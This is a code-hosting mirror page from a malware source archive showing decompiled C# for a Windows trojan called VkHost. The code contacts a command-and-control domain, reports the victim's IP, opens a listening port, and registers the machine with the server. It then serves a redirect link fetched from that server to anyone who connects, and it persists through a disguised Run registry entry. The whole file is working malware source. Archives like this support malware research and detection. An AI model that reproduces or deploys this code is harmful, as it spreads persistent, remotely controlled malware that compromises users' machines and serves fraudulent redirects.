ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4121be2648
MalwareSourceCode/MSIL/Trojan/Win32/V/Trojan.Win32.VkHost.dvc-cebd5866bd3a8ab16d1ffbabeabc73e1b262382f3473ba551e2b95a3bcc567f3/Module1.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

90 lines
2.9 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: ConsoleApplication1.Module1
// Assembly: WebServer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 043129F4-C961-4DF7-9AE5-51E1A9EDC384
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.VkHost.dvc-cebd5866bd3a8ab16d1ffbabeabc73e1b262382f3473ba551e2b95a3bcc567f3.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;
namespace ConsoleApplication1
{
[StandardModule]
internal sealed class Module1
{
[STAThread]
public static void Main()
{
WebClient webClient = new WebClient();
string str1 = "personal-iq-test.ru";
int num1;
while (true)
{
num1 = 1;
try
{
webClient.DownloadString("http://" + str1);
break;
}
catch (Exception ex)
{
int lErl = num1;
ProjectData.SetProjectError(ex, lErl);
Thread.Sleep(5000);
ProjectData.ClearProjectError();
}
}
TcpListener tcpListener = new TcpListener(799);
Console.WriteLine("Сервер ждёт запроса от клиента");
tcpListener.Start();
string str2 = webClient.DownloadString("http://" + str1 + "/get_my_ip.php");
if (Operators.CompareString(webClient.DownloadString("http://" + str1 + "/test_port.php?ip=" + str2 + "&port=799"), "true", false) == 0)
{
Module1.Автозагрузка();
webClient.DownloadString("http://" + str1 + "/add_ip.php?ip=" + str2);
string redirectLink = webClient.DownloadString("http://" + str1 + "/redirect_link.php");
while (true)
{
try
{
TcpClient Client = tcpListener.AcceptTcpClient();
Console.WriteLine("Server: Connection accepted.");
int num2;
checked { ++num2; }
new Thread(new ThreadStart(new ClientHandler(Client, "Client " + num2.ToString(), redirectLink).Start))
{
IsBackground = true
}.Start();
}
catch (Exception ex)
{
int lErl = num1;
ProjectData.SetProjectError(ex, lErl);
Console.WriteLine(ex.ToString());
ProjectData.ClearProjectError();
}
}
}
else
webClient.DownloadString("http://" + str1 + "/add_stat_ip.php?ip=" + str2);
}
private static void Автозагрузка()
{
try
{
Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("PC explorer", (object) (Environment.GetEnvironmentVariable("SYSTEMROOT") + "\\system32\\drivers\\etc\\WebServer.exe"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink